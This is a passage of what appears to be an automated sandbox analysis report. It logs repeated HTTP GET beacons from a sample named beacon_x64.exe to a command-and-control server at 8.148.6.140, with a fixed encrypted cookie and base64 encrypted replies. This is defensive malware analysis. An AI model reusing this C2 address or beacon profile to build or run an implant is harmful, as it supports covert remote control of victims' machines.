          Data Raw: 63 37 72 77 42 71 43 4b 4b 57 52 43 6d 4e 46 6d 49 67 7a 4f 37 6a 31 70 7a 33 44 46 67 38 67 56 4a 6c 72 50 37 69 64 35 6f 6e 32 33 7a 4e 32 50 38 4b 2f 6c 63 35 70 4b 5a 43 39 33 56 68 66 4d 6e 52 31 5a 6f 37 2f 59 34 50 74 6c 38 50 57 34 72 4b 4d 78 64 6f 4f 70 78 33 52 72 4a 63 55 4a 75 36 42 59 4c 68 7a 5a 78 42 63 3d
          Data Ascii: c7rwBqCKKWRCmNFmIgzO7j1pz3DFg8gVJlrP7id5on23zN2P8K/lc5pKZC93VhfMnR1Zo7/Y4Ptl8PW4rKMxdoOpx3RrJcUJu6BYLhzZxBc=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          78192.168.2.6500668.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:20.812406063 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:21.818121910 CET401INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:21 GMT
          Server: nginx
          Content-Length: 216
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 4d 50 58 52 6a 67 52 4d 43 49 53 2b 74 61 2b 73 78 53 48 49 2f 67 34 65 59 49 4c 32 32 35 38 77 2f 52 43 46 73 41 76 64 75 59 70 45 41 58 54 59 62 30 65 4f 32 53 62 44 70 59 6e 30 6f 6f 32 77 54 74 35 4a 66 37 2b 50 72 72 6a 57 37 61 74 59 47 43 4f 4b 34 5a 58 54 6e 48 79 70 41 72 6a 57 55 41 4a 6b 53 6d 32 54 77 56 51 61 67 48 43 4a 69 67 4a 43 56 5a 48 6b 33 48 49 56 4b 4d 6d 7a 51 37 37 68 4d 4a 65 34 34 6c 55 7a 6b 6e 4e 61 70 2b 76 31 59 34 78 46 34 44 6e 48 73 6e 5a 76 51 59 51 68 6f 52 64 6e 31 53 53 39 57 55 4b 74 71 4b 6b 4a 2b 58 2f 7a 41 46 53 4c 6a 70 56 66 72 38 6a 77 4e 41 58 50 74 4b 6e 4f 6f 4d 54 76 34 46 63 4d 76 67 3d 3d
          Data Ascii: MPXRjgRMCIS+ta+sxSHI/g4eYIL2258w/RCFsAvduYpEAXTYb0eO2SbDpYn0oo2wTt5Jf7+PrrjW7atYGCOK4ZXTnHypArjWUAJkSm2TwVQagHCJigJCVZHk3HIVKMmzQ77hMJe44lUzknNap+v1Y4xF4DnHsnZvQYQhoRdn1SS9WUKtqKkJ+X/zAFSLjpVfr8jwNAXPtKnOoMTv4FcMvg==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          79192.168.2.6500678.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:21.936686993 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          80192.168.2.6500688.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:22.922439098 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:24.454638004 CET313INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:24 GMT
          Server: nginx
          Content-Length: 128
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 54 39 4a 6b 6f 35 66 73 6f 2f 4e 64 30 6b 36 6e 36 39 38 75 45 43 2f 38 44 36 58 38 68 4a 45 4a 32 5a 72 37 31 47 69 65 59 38 48 70 61 50 37 76 39 4c 44 76 69 30 49 49 37 31 4e 6c 5a 51 6d 38 50 79 34 53 63 55 6b 50 71 38 6e 32 50 78 68 6a 79 70 33 43 69 30 42 72 77 51 31 35 52 68 38 72 30 6c 36 2b 38 35 65 43 39 6d 6f 74 6c 71 4e 64 6d 35 78 58 31 48 67 49 77 6a 4d 64 6a 6e 7a 74
          Data Ascii: T9Jko5fso/Nd0k6n698uEC/8D6X8hJEJ2Zr71GieY8HpaP7v9LDvi0II71NlZQm8Py4ScUkPq8n2Pxhjyp3Ci0BrwQ15Rh8r0l6+85eC9motlqNdm5xX1HgIwjMdjnzt


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          81192.168.2.6500698.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:24.583391905 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          82192.168.2.6500708.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:25.629178047 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:26.626981020 CET313INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:26 GMT
          Server: nginx
          Content-Length: 128
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 2b 6d 4b 47 38 6b 64 59 45 72 74 6d 61 2b 4c 65 63 35 4b 37 38 7a 4e 62 31 76 55 4b 72 77 4c 71 75 72 39 77 2f 32 79 2b 75 54 52 4d 53 34 47 35 32 5a 7a 62 72 47 48 50 78 39 41 6c 48 38 34 48 59 34 4c 4d 4d 42 41 65 46 74 73 58 73 46 65 6b 68 30 78 58 67 65 2b 54 4e 5a 67 59 76 2b 31 59 73 4b 4f 57 76 30 33 77 74 41 43 50 48 47 61 6a 69 5a 41 4b 72 4f 4f 67 39 67 57 69 51 77 30 4c
          Data Ascii: +mKG8kdYErtma+Lec5K78zNb1vUKrwLqur9w/2y+uTRMS4G52ZzbrGHPx9AlH84HY4LMMBAeFtsXsFekh0xXge+TNZgYv+1YsKOWv03wtACPHGajiZAKrOOg9gWiQw0L


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          83192.168.2.6500718.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:26.755108118 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          84192.168.2.6500728.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:27.718604088 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:31.663121939 CET465INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:31 GMT
          Server: nginx
          Content-Length: 280
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 36 6c 6f 39 2f 70 58 31 51 6b 69 7a 34 43 55 72 67 68 34 4b 34 51 42 33 35 32 4a 45 35 45 41 4e 39 4a 48 58 46 41 79 36 73 4b 52 66 49 6e 52 4f 66 58 68 39 79 6a 2f 6e 69 2b 50 6a 61 42 42 4e 53 42 4a 74 31 5a 56 57 6f 6e 65 31 50 2b 6d 4d 70 43 4a 7a 2b 4d 6a 6e 56 69 41 4e 4f 65 65 7a 44 56 7a 39 54 53 61 38 33 77 55 47 39 36 35 56 69 52 77 64 6c 6c 47 50 32 49 42 6c 42 32 47 49 66 64 55 41 50 4a 70 4d 4c 76 38 79 57 2b 5a 49 50 2f 4a 6d 43 4f 43 4c 54 74 53 53 5a 34 57 48 4a 34 33 67 6f 49 38 50 37 48 74 7a 71 34 52 62 64 75 61 4d 55 5a 57 31 62 56 51 72 6c 52 57 4e 32 4c 4f 38 71 4c 33 55 4b 46 53 4e 2f 6d 6a 57 71 4f 41 4b 61 6d 4e 47 76 71 78 4e 38 33 42 5a 6e 70 45 35 77 59 52 57 67 33 38 67 59 34 78 39 2f 4b 67 42 39 4a 64 4b 4c 63 50 43 68 2b 6c 4f 36 6b 48 53 50 51 70 4f 63 4b 45 52 4f 41 31 65 32 47 46 55 4d 77 3d 3d
          Data Ascii: 6lo9/pX1Qkiz4CUrgh4K4QB352JE5EAN9JHXFAy6sKRfInROfXh9yj/ni+PjaBBNSBJt1ZVWone1P+mMpCJz+MjnViANOeezDVz9TSa83wUG965ViRwdllGP2IBlB2GIfdUAPJpMLv8yW+ZIP/JmCOCLTtSSZ4WHJ43goI8P7Htzq4RbduaMUZW1bVQrlRWN2LO8qL3UKFSN/mjWqOAKamNGvqxN83BZnpE5wYRWg38gY4x9/KgB9JdKLcPCh+lO6kHSPQpOcKEROA1e2GFUMw==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          85192.168.2.6500738.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:31.792303085 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          86192.168.2.6500748.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:32.784753084 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          87192.168.2.6500758.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:33.797542095 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          88192.168.2.6500768.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:37.990502119 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          89192.168.2.6500778.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:38.986259937 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          90192.168.2.6500788.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:39.937341928 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          91192.168.2.6500798.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:44.063258886 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          92192.168.2.6500808.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:48.142606020 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          93192.168.2.6500818.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:49.111843109 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:50.095115900 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:49 GMT
          Server: nginx
          Content-Length: 300
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:27:50.095279932 CET300INData Raw: 4b 6a 4a 65 49 4b 44 66 74 6f 75 62 71 70 51 76 48 62 31 57 64 54 42 72 6b 4b 43 41 31 6b 33 77 43 52 6e 53 52 34 6b 2f 76 61 65 5a 77 72 36 67 61 63 63 4a 69 37 4d 67 44 61 6b 71 58 6f 2f 63 51 6e 65 51 53 74 75 67 30 59 57 38 5a 53 4f 75 6c 70
          Data Ascii: KjJeIKDftoubqpQvHb1WdTBrkKCA1k3wCRnSR4k/vaeZwr6gaccJi7MgDakqXo/cQneQStug0YW8ZSOulpD1txwclQMB/F/VBDEWaCGKgLzN21UHuFfGGXmWFpdio1wpz1QI96i07SkYMdlbeXguz+aRgxg1Of5zlefvBcQ8K+WG0KKRXphdAOq17SKcDEoUQRxfA2O0yt5OIFAoo2LHTgC4c01Jk3NjB1aO5hQoHp5hZjqfJMQ


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          94192.168.2.6500828.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:50.218101978 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:51.189567089 CET421INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:51 GMT
          Server: nginx
          Content-Length: 236
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 74 2f 6f 39 6b 43 30 6a 52 53 48 5a 54 66 31 38 55 6b 4c 54 4f 4c 79 6b 69 54 7a 74 63 30 46 65 4c 54 45 35 36 77 58 49 65 61 54 79 6f 58 47 35 43 4d 2b 76 37 33 30 53 32 42 6a 57 67 58 31 59 44 51 61 6b 37 41 4b 35 63 36 62 63 6b 7a 42 54 44 2f 66 65 44 75 70 4b 38 6d 42 71 66 64 67 79 63 58 47 77 68 5a 67 7a 47 73 7a 43 70 58 4c 48 62 2f 51 69 34 6e 53 48 73 79 48 34 4f 70 57 4b 4f 79 59 36 79 56 30 55 47 72 41 4a 74 78 59 7a 7a 53 39 34 50 69 50 77 47 6c 5a 39 51 72 2b 42 4a 6e 55 6c 4d 35 34 52 57 63 47 34 65 6c 62 76 4a 5a 50 38 6e 31 49 6b 6c 54 73 45 38 72 4b 39 35 57 4f 30 31 6f 34 71 46 79 48 69 54 4f 4c 51 75 64 4d 52 67 31 4f 6f 31 5a 77 78 78 4e 59 58 48 69 55 7a 52 63 54 78 77 30 59 3d
          Data Ascii: t/o9kC0jRSHZTf18UkLTOLykiTztc0FeLTE56wXIeaTyoXG5CM+v730S2BjWgX1YDQak7AK5c6bckzBTD/feDupK8mBqfdgycXGwhZgzGszCpXLHb/Qi4nSHsyH4OpWKOyY6yV0UGrAJtxYzzS94PiPwGlZ9Qr+BJnUlM54RWcG4elbvJZP8n1IklTsE8rK95WO01o4qFyHiTOLQudMRg1Oo1ZwxxNYXHiUzRcTxw0Y=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          95192.168.2.6500838.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:51.311728954 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:52.312535048 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:52 GMT
          Server: nginx
          Content-Length: 320
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:27:52.312588930 CET320INData Raw: 4b 56 6f 69 69 4e 44 57 67 75 68 63 6b 73 6c 52 6d 79 69 47 4b 47 4d 4e 32 4b 44 32 79 7a 59 5a 45 62 36 56 71 6a 33 4d 55 34 2f 44 78 2f 2f 44 5a 30 77 6f 48 75 73 51 30 66 2f 32 41 43 61 72 50 66 57 5a 6f 4b 6c 7a 51 4c 62 76 48 53 70 57 6a 41
          Data Ascii: KVoiiNDWguhckslRmyiGKGMN2KD2yzYZEb6Vqj3MU4/Dx//DZ0woHusQ0f/2ACarPfWZoKlzQLbvHSpWjAl1RkgCZPreNc3X8ujGqgFaDStZ0zfrHP0G4nUUcH5Ne52TmQ68W0xddRGbtI8QW1OCO8DWE1eGGgs8rGskJ446XoP7LkUMllDn4ApCu9HkkHJi+Vx8AZA7sbL4u0cgHrw8Hk8kuCWVNRZtz0rng99JWfPqO4YQ8mm


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          96192.168.2.6500848.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:52.592216015 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
